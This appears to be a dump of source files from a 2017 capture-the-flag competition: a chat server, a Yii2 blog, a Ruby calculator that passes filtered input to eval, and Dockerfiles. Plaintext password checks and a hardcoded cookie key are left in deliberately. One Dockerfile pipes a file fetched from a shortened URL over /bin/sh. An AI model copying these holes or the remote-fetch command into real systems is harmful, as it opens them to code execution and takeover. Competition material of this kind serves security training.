socket.on('rooms', function() { 62 | var temp = [] 63 | for(var room in rooms) { 64 | if (rooms.hasOwnProperty(room)) { 65 | temp.push(room); 66 | } 67 | } 68 | socket.emit('msg', { 69 | name: "system", 70 | room: "global", 71 | msg: "rooms: " + temp.join(', ') 72 | }) 73 | }) 74 | 75 | socket.on('history', function() { 76 | for (var i = 0; i < rooms[room].backlog.length; i++) { 77 | socket.emit('msg', rooms[room].backlog[i]); 78 | }; 79 | }); 80 | 81 | socket.on('msg', function(msg) { 82 | rooms[msg.room].backlog.push(msg); 83 | io.to(msg.room).emit('msg', msg); 84 | }) 85 | }); 86 | 87 | http.listen(port, function(){ 88 | console.log('listening on *:' + port); 89 | }); -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app/css/site.css: -------------------------------------------------------------------------------- 1 | body { 2 | position: absolute; 3 | top: 0; 4 | bottom: 0; 5 | left: 0; 6 | right: 0; 7 | margin: 0; 8 | padding: 0; 9 | outline: 0; 10 | border: none; 11 | background-color: #1B1B1B; 12 | color: lightgrey; 13 | } 14 | 15 | div { 16 | position: fixed; 17 | } 18 | 19 | #window { 20 | top: 10px; 21 | left: 10px; 22 | right: 10px; 23 | bottom: 50px; 24 | border: 2px solid lightgrey; 25 | } 26 | 27 | #window ul { 28 | list-style: none; 29 | position: absolute; 30 | overflow: auto; 31 | top: 0; 32 | left: 0; 33 | right: 0; 34 | bottom: 0; 35 | margin: 0; 36 | padding: 5px; 37 | } 38 | 39 | #window ul li { 40 | min-height: 19px; 41 | width: 100%; 42 | margin: 0; 43 | padding: 1px; 44 | } 45 | 46 | #window ul span { 47 | height: 100%; 48 | margin: 0; 49 | padding: 1px; 50 | vertical-align: middle; 51 | } 52 | 53 | #window ul span.name { 54 | color: green; 55 | } 56 | 57 | #input { 58 | left: 10px; 59 | right: 10px; 60 | bottom: 10px; 61 | border: 2px solid lightgrey; 62 | height: 30px; 63 | } 64 | 65 | #input span { 66 | position: absolute; 67 | left: 0; 68 | bottom: 0; 69 | top: 0; 70 | width: 15px; 71 | padding-top: 5px; 72 | padding-left: 10px; 73 | margin: 0; 74 | font-size: 20px; 75 | font-weight: bolder; 76 | } 77 | 78 | #input .wrapper { 79 | position: absolute; 80 | right: 52px; 81 | left: 30px; 82 | bottom: 0; 83 | top: 0; 84 | } 85 | 86 | #input input[type=text] { 87 | width: 100%; 88 | height: 100%; 89 | border: none; 90 | outline: none; 91 | margin: 0; 92 | background-color: inherit; 93 | color: inherit; 94 | } 95 | 96 | #input button { 97 | position: absolute; 98 | border: none; 99 | outline: none; 100 | border-left: 2px solid lightgrey; 101 | background-color: inherit; 102 | color: inherit; 103 | padding: 1px 5px; 104 | right: 0; 105 | width: 50px; 106 | bottom: 0; 107 | top: 0; 108 | } 109 | 110 | #input button:active { 111 | color: black; 112 | background-color: lightgrey; 113 | } -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/dependencyLibs/inputmask.dependencyLib.jqlite.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * dependencyLibs/inputmask.dependencyLib.jqlite.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jqlite","../global/window","../global/document]"],a):"object"==typeof exports?module.exports=a(require("jqlite"),require("../global/window"),require("../global/document")):window.dependencyLib=a(jqlite,window,document)}(function(a,b,c){function d(a,b){for(var c=0,d=a.length;c0&&b-1 in a))}for(var h={},i="Boolean Number String Function Array Date RegExp Object Error".split(" "),j=0;j 2 | 3 | 4 | 5 | Comot - {title} 6 | 7 | 8 | 9 | 12 | 13 | 14 |
15 |
16 |

{title}

17 | {name} 18 |

19 |

{note}

20 |
21 |
22 | 23 | 24 | 27 | 28 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/css/site.css: -------------------------------------------------------------------------------- 1 | html, 2 | body { 3 | height: 100%; 4 | } 5 | 6 | .wrap { 7 | min-height: 100%; 8 | height: auto; 9 | margin: 0 auto -60px; 10 | padding: 0 0 60px; 11 | } 12 | 13 | .wrap > .container { 14 | padding: 70px 15px 20px; 15 | } 16 | 17 | .footer { 18 | height: 60px; 19 | background-color: #f5f5f5; 20 | border-top: 1px solid #ddd; 21 | padding-top: 20px; 22 | } 23 | 24 | .jumbotron { 25 | text-align: center; 26 | background-color: transparent; 27 | } 28 | 29 | .jumbotron .btn { 30 | font-size: 21px; 31 | padding: 14px 24px; 32 | } 33 | 34 | .not-set { 35 | color: #c55; 36 | font-style: italic; 37 | } 38 | 39 | /* add sorting icons to gridview sort links */ 40 | a.asc:after, a.desc:after { 41 | position: relative; 42 | top: 1px; 43 | display: inline-block; 44 | font-family: 'Glyphicons Halflings'; 45 | font-style: normal; 46 | font-weight: normal; 47 | line-height: 1; 48 | padding-left: 5px; 49 | } 50 | 51 | a.asc:after { 52 | content: /*"\e113"*/ "\e151"; 53 | } 54 | 55 | a.desc:after { 56 | content: /*"\e114"*/ "\e152"; 57 | } 58 | 59 | .sort-numerical a.asc:after { 60 | content: "\e153"; 61 | } 62 | 63 | .sort-numerical a.desc:after { 64 | content: "\e154"; 65 | } 66 | 67 | .sort-ordinal a.asc:after { 68 | content: "\e155"; 69 | } 70 | 71 | .sort-ordinal a.desc:after { 72 | content: "\e156"; 73 | } 74 | 75 | .grid-view th { 76 | white-space: nowrap; 77 | } 78 | 79 | .hint-block { 80 | display: block; 81 | margin-top: 5px; 82 | color: #999; 83 | } 84 | 85 | .error-summary { 86 | color: #a94442; 87 | background: #fdf7f7; 88 | border-left: 3px solid #eed3d7; 89 | padding: 10px 20px; 90 | margin: 0 0 15px 0; 91 | } 92 | 93 | /* align the logout "link" (button in form) of the navbar */ 94 | .nav li > form > button.logout { 95 | padding: 15px; 96 | border: none; 97 | } 98 | 99 | @media(max-width:767px) { 100 | .nav li > form > button.logout { 101 | display:block; 102 | text-align: left; 103 | width: 100%; 104 | padding: 10px 15px; 105 | } 106 | } 107 | 108 | .nav > li > form > button.logout:focus, 109 | .nav > li > form > button.logout:hover { 110 | text-decoration: none; 111 | } 112 | 113 | .nav > li > form > button.logout:focus { 114 | outline: none; 115 | } 116 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/models/User.php: -------------------------------------------------------------------------------- 1 | where(['username'=>$username])->one(); 57 | 58 | if(count($user)){ 59 | return new static($user); 60 | } 61 | 62 | return null; 63 | } 64 | 65 | /** 66 | * @inheritdoc 67 | */ 68 | public function getId() 69 | { 70 | return $this->id; 71 | } 72 | 73 | /** 74 | * @inheritdoc 75 | */ 76 | public function getAuthKey() 77 | { 78 | return $this->authKey; 79 | } 80 | 81 | /** 82 | * @inheritdoc 83 | */ 84 | public function validateAuthKey($authKey) 85 | { 86 | return $this->authKey === $authKey; 87 | } 88 | 89 | /** 90 | * Validates password 91 | * 92 | * @param string $password password to validate 93 | * @return bool if password provided is valid for current user 94 | */ 95 | public function validatePassword($password) 96 | { 97 | return $this->password === $password; 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/math: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/ruby 2 | puts """ 3 | 3.141592653589793238462643383279502884197 4 | 1693993751058209749445923078164062862089986 5 | 280348253421170679821480865132823066470938446 6 | 0955058223172535940812848111745028410270193852 7 | 11055596446229489549303819644288109756659334461 8 | 284756482337867831652712019091456485669234603486 9 | 104543266482133936072602491412737245870066063155 10 | 881748815209209628292540917153643678925903600113 11 | 30530548820 46652 13841 12 | 4695194 15116 094330 13 | 572703 65759 59195 14 | 30921 861173 81932 15 | 6117 93105 11854 16 | 807446 23799 17 | 627495 673518 18 | 857527 248912 19 | 279381 830119 20 | 491298 336733 21 | 6244065 664308 22 | 6021394 9463952 23 | 2473719 07021798 24 | 6094370 27705392 25 | 17176293 17675238 26 | 46748184 676694051 27 | 32000568 127145263 28 | 56082778 577134275 29 | 778960917 3637178721 30 | 468440901 2249534301 31 | 465495853 71050792279 32 | 689258923 54201995611 33 | 2129021960 864034418159 34 | 8136297747 71309960518 35 | 7072113499 99998372978 36 | 0499510597 31732816096 37 | 3185950244 594553469 38 | 08302642 522308253 39 | 3446850 3526193 40 | """ 41 | puts "Hi, please input your calculation here, finished with '='" 42 | puts "Example: 6+5=" 43 | STDOUT.flush 44 | $/ = "=" 45 | input = STDIN.gets() 46 | input = input.split(/=/).first 47 | #input = gets("\t\n") 48 | if /^([-+]?[0-9]*\.?[0-9]+[\/\+\-\*])+([-+]?[0-9]*\.?[0-9]+)$/.match(input) 49 | puts eval(input) 50 | else 51 | puts("no cheating") 52 | end 53 | 54 | STDOUT.flush 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python -y 12 | RUN apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev nodejs -y 13 | RUN apt-get install python-pip -y 14 | 15 | # Read arg 16 | ARG flag 17 | ARG flag_name 18 | ARG binary 19 | ARG username 20 | ARG password 21 | ENV flag=${flag} 22 | ENV flag_name=${flag_name} 23 | ENV binary=${binary} 24 | ENV username=${username} 25 | ENV password=${password} 26 | 27 | # Install requirements 28 | 29 | # Set WorkDir 30 | RUN mkdir /app 31 | WORKDIR /app 32 | COPY challs/* /app/ 33 | RUN pip install -r /app/requirements.txt 34 | 35 | 36 | # SSH Docker 37 | EXPOSE 22 38 | RUN mkdir /var/run/sshd 39 | RUN adduser --disabled-password --gecos "" $username 40 | RUN echo "$username:$password" | chpasswd 41 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 42 | 43 | 44 | # Copy ruby to workdir 45 | 46 | RUN echo $flag > "/app/$flag_name" 47 | RUN chown -R root:$username /app/* && chmod -R 775 /app/* 48 | RUN chown root:root $flag_name && chmod 755 $flag_name 49 | #RUN chown "root:$username" $binary && chmod 775 $binary 50 | 51 | 52 | 53 | #RUN cp /usr/bin/ruby /usr/local/bin/ 54 | 55 | # Securing environment 56 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 57 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 58 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/python 59 | #RUN chmod 777 /usr/bin/ruby 60 | 61 | 62 | 63 | 64 | # Run Program 65 | #RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 66 | #CMD ["gunicorn" "--bind" "0.0.0.0:5000" "wsgi"] 67 | #CMD gunicorn --bind 0.0.0.0:5000 wsgi --user=nobody 68 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 69 | #CMD ["/start.sh"] 70 | RUN echo '#!/bin/bash'"\n(gunicorn --reload --bind 0.0.0.0:5000 --chdir /app wsgi --user=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 71 | 72 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 73 | CMD ["/start.sh"] -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "yiisoft/yii2-app-basic", 3 | "description": "Yii 2 Basic Project Template", 4 | "keywords": ["yii2", "framework", "basic", "project template"], 5 | "homepage": "http://www.yiiframework.com/", 6 | "type": "project", 7 | "license": "BSD-3-Clause", 8 | "support": { 9 | "issues": "https://github.com/yiisoft/yii2/issues?state=open", 10 | "forum": "http://www.yiiframework.com/forum/", 11 | "wiki": "http://www.yiiframework.com/wiki/", 12 | "irc": "irc://irc.freenode.net/yii", 13 | "source": "https://github.com/yiisoft/yii2" 14 | }, 15 | "minimum-stability": "dev", 16 | "require": { 17 | "php": ">=5.4.0", 18 | "yiisoft/yii2": "~2.0.5", 19 | "yiisoft/yii2-bootstrap": "~2.0.0", 20 | "yiisoft/yii2-swiftmailer": "~2.0.0" 21 | }, 22 | "require-dev": { 23 | "yiisoft/yii2-debug": "~2.0.0", 24 | "yiisoft/yii2-gii": "~2.0.0", 25 | "yiisoft/yii2-faker": "~2.0.0", 26 | 27 | "codeception/base": "^2.2.3", 28 | "codeception/verify": "~0.3.1", 29 | "codeception/specify": "~0.4.3" 30 | }, 31 | "config": { 32 | "process-timeout": 1800, 33 | "fxp-asset":{ 34 | "installer-paths": { 35 | "npm-asset-library": "vendor/npm", 36 | "bower-asset-library": "vendor/bower" 37 | } 38 | } 39 | }, 40 | "scripts": { 41 | "post-install-cmd": [ 42 | "yii\\composer\\Installer::postInstall" 43 | ], 44 | "post-create-project-cmd": [ 45 | "yii\\composer\\Installer::postCreateProject", 46 | "yii\\composer\\Installer::postInstall" 47 | ] 48 | }, 49 | "extra": { 50 | "yii\\composer\\Installer::postCreateProject": { 51 | "setPermission": [ 52 | { 53 | "runtime": "0777", 54 | "web/assets": "0777", 55 | "yii": "0755" 56 | } 57 | ] 58 | }, 59 | "yii\\composer\\Installer::postInstall": { 60 | "generateCookieValidationKey": [ 61 | "config/web.php" 62 | ] 63 | }, 64 | "asset-installer-paths": { 65 | "npm-asset-library": "vendor/npm", 66 | "bower-asset-library": "vendor/bower" 67 | } 68 | }, 69 | "repositories": [ 70 | { 71 | "type": "composer", 72 | "url": "https://asset-packagist.org" 73 | } 74 | ] 75 | } 76 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/home.php: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |

Musicality

5 |

Begin your music career here

6 |
7 |
8 |
9 | 10 |
11 |
12 |
13 |
14 |
15 | 16 |
17 |
18 |
19 |
20 |

For those about to rock...

21 |

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Quod aliquid, mollitia odio veniam sit iste esse assumenda amet aperiam exercitationem, ea animi blanditiis recusandae! Ratione voluptatum molestiae adipisci, beatae obcaecati.

22 |
23 |
24 |
25 |
26 |
27 | 28 |
29 |
30 |
31 |
32 |
33 | 34 |
35 |
36 |
37 |
38 |

We salute you!

39 |

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Quod aliquid, mollitia odio veniam sit iste esse assumenda amet aperiam exercitationem, ea animi blanditiis recusandae! Ratione voluptatum molestiae adipisci, beatae obcaecati.

40 |
41 |
42 |
43 |
44 |
45 | 46 |
47 |
48 |
49 |
50 |
51 | 52 |
53 |
54 |
55 |
56 |

Let there be rock!

57 |

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Quod aliquid, mollitia odio veniam sit iste esse assumenda amet aperiam exercitationem, ea animi blanditiis recusandae! Ratione voluptatum molestiae adipisci, beatae obcaecati.

58 |
59 |
60 |
61 |
62 |
-------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/web.php: -------------------------------------------------------------------------------- 1 | 'basic', 8 | 'basePath' => dirname(__DIR__), 9 | 'bootstrap' => ['log'], 10 | 'aliases' => [ 11 | '@bower' => '@vendor/bower-asset', 12 | '@npm' => '@vendor/npm-asset', 13 | ], 14 | 'components' => [ 15 | 'request' => [ 16 | // !!! insert a secret key in the following (if it is empty) - this is required by cookie validation 17 | 'cookieValidationKey' => '502When6754CanNotExitFromThisRealm777', 18 | ], 19 | 'cache' => [ 20 | 'class' => 'yii\caching\FileCache', 21 | ], 22 | 'user' => [ 23 | 'identityClass' => 'app\models\User', 24 | 'enableAutoLogin' => true, 25 | ], 26 | 'errorHandler' => [ 27 | 'errorAction' => 'site/error', 28 | ], 29 | 'mailer' => [ 30 | 'class' => 'yii\swiftmailer\Mailer', 31 | // send all mails to a file by default. You have to set 32 | // 'useFileTransport' to false and configure a transport 33 | // for the mailer to send real emails. 34 | 'useFileTransport' => true, 35 | ], 36 | 'log' => [ 37 | 'traceLevel' => YII_DEBUG ? 3 : 0, 38 | 'targets' => [ 39 | [ 40 | 'class' => 'yii\log\FileTarget', 41 | 'levels' => ['error', 'warning'], 42 | ], 43 | ], 44 | ], 45 | 'db' => $db, 46 | 47 | 'urlManager' => [ 48 | 'enablePrettyUrl' => true, 49 | 'showScriptName' => false, 50 | 'rules' => [ 51 | '' => 'site/', 52 | ], 53 | ], 54 | 55 | ], 56 | 'params' => $params, 57 | ]; 58 | 59 | if (YII_ENV_DEV) { 60 | // configuration adjustments for 'dev' environment 61 | $config['bootstrap'][] = 'debug'; 62 | $config['modules']['debug'] = [ 63 | 'class' => 'yii\debug\Module', 64 | // uncomment the following to add your IP if you are not connecting from localhost. 65 | //'allowedIPs' => ['127.0.0.1', '::1'], 66 | ]; 67 | 68 | $config['bootstrap'][] = 'gii'; 69 | $config['modules']['gii'] = [ 70 | 'class' => 'yii\gii\Module', 71 | // uncomment the following to add your IP if you are not connecting from localhost. 72 | //'allowedIPs' => ['127.0.0.1', '::1'], 73 | ]; 74 | } 75 | 76 | return $config; 77 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/widgets/Alert.php: -------------------------------------------------------------------------------- 1 | session->setFlash('error', 'This is the message'); 12 | * Yii::$app->session->setFlash('success', 'This is the message'); 13 | * Yii::$app->session->setFlash('info', 'This is the message'); 14 | * ``` 15 | * 16 | * Multiple messages could be set as follows: 17 | * 18 | * ```php 19 | * Yii::$app->session->setFlash('error', ['Error 1', 'Error 2']); 20 | * ``` 21 | * 22 | * @author Kartik Visweswaran 23 | * @author Alexander Makarov 24 | */ 25 | class Alert extends \yii\bootstrap\Widget 26 | { 27 | /** 28 | * @var array the alert types configuration for the flash messages. 29 | * This array is setup as $key => $value, where: 30 | * - key: the name of the session flash variable 31 | * - value: the bootstrap alert type (i.e. danger, success, info, warning) 32 | */ 33 | public $alertTypes = [ 34 | 'error' => 'alert-danger', 35 | 'danger' => 'alert-danger', 36 | 'success' => 'alert-success', 37 | 'info' => 'alert-info', 38 | 'warning' => 'alert-warning' 39 | ]; 40 | /** 41 | * @var array the options for rendering the close button tag. 42 | * Array will be passed to [[\yii\bootstrap\Alert::closeButton]]. 43 | */ 44 | public $closeButton = []; 45 | 46 | /** 47 | * {@inheritdoc} 48 | */ 49 | public function run() 50 | { 51 | $session = Yii::$app->session; 52 | $flashes = $session->getAllFlashes(); 53 | $appendClass = isset($this->options['class']) ? ' ' . $this->options['class'] : ''; 54 | 55 | foreach ($flashes as $type => $flash) { 56 | if (!isset($this->alertTypes[$type])) { 57 | continue; 58 | } 59 | 60 | foreach ((array) $flash as $i => $message) { 61 | echo \yii\bootstrap\Alert::widget([ 62 | 'body' => $message, 63 | 'closeButton' => $this->closeButton, 64 | 'options' => array_merge($this->options, [ 65 | 'id' => $this->getId() . '-' . $type . '-' . $i, 66 | 'class' => $this->alertTypes[$type] . $appendClass, 67 | ]), 68 | ]); 69 | } 70 | 71 | $session->removeFlash($type); 72 | } 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/tf.txt: -------------------------------------------------------------------------------- 1 | QQOQ0QQQQQQQQ0OQ0Q00QQQQQOOQQ000Q0QQQQQQQQOQQQQOQQQQOQQQQ0QQQQQQQQQQQ0QQQQ0 2 | QQQOOQQOQQQQQQQOQQQQQQQ0QQQQQQQQQQQQOQQ0QOQQQOQQQQQQQQQO0QQQO0QOQQ0QQQQ0QQQ 3 | QQOOQQ0OQOQQQOQQQQQQQOQOQQQQQOQQQ0QQQQ0OQQ0QQQQQQQQQQQ0OOQQQ0QQQQQQQQQQQ0QQ 4 | 0Q0OQQQOOQQQQQQQOQQWOQ00OWWWBBBHHHHHHHHHBWWWQOQOQOQQQQOQQQQ0OQQQQQQQQQOOQQQ 5 | 0QQQ0QQQQOQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQ00QQ0O0QQQQQQOQ0 6 | QQQQO0Q0QO0Q0P'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQOQQQQQQQQQ 7 | QOQ0QOQQQO0W! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQ0QQOQQQOQ 8 | 0QQQQQQ0QQW' jOQ0OWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HOOQQQOw,-4OQQQQQOQQ 9 | QQQ0QQQO0Q[ jO0QQQyWVw2$wWWQQ0WWQWWWW7WQQQOOOQQPWWQ0QWQQw7W0OQWWc)WWQQQQ0QO 10 | QQQQQQQQQf jQOQQQWWmWmm0WU???????9WWQmWQQQQQOQWjWQQOQQQQWQmQQQOWL 4QQOQQQOQ 11 | QOQQ0QQP'.yOOQQQQ0Q0OQP" xwa,.!4WQQQQQOQWdWP??!"??4WWQ0QWQQc ?OWQQQQQ 12 | QQQQOP'_a._aamQQQW!_yF "!` .. "??$Qa "WQ0QWTVP' "??' =QQmWWV?46/ ?QQQQ0 13 | QQOP'sdyWQP?!`.-"?46mOQOOOQT!m0Ogaa. ;wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ 14 | QQ[ j@mQP'adQQP4ga, -????" +jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ 15 | QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ 16 | QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ 17 | QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ 18 | QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'imWWWWWQW?^ ` ]6QQ' yQQQQQ 19 | QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ 20 | QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc ,aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ 21 | QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ 22 | QQQQQQQQQc-QWQQQQQW6, QWQWQQQk ,c jWQ ]QQQQQQQ 23 | QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ 24 | QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ 25 | QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ 26 | QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ 27 | QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ 28 | QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}mwBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ 29 | QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ 30 | QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW 31 | QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ 32 | QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ 33 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ 34 | QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ 35 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/troll.txt: -------------------------------------------------------------------------------- 1 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 2 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 3 | QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 4 | QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 5 | QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ 6 | QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ 7 | QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ 8 | QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ 9 | QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ 10 | QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ 11 | QQQQQQQP'.yQQQQQQQQQQQP" xwa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ 12 | QQQQQP'_a._aamQQQW!_yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ 13 | QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. ;wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ 14 | QQ[ j@mQP'adQQP4ga, -????" +jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ 15 | QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ 16 | QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ 17 | QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ 18 | QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'imWWWWWQW?^ ` ]6QQ' yQQQQQ 19 | QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ 20 | QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc ,aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ 21 | QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ 22 | QQQQQQQQQc-QWQQQQQW6, QWQWQQQk ,c jWQ ]QQQQQQQ 23 | QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ 24 | QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ 25 | QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ 26 | QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ 27 | QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ 28 | QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}mwBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ 29 | QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ 30 | QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW 31 | QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ 32 | QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ 33 | 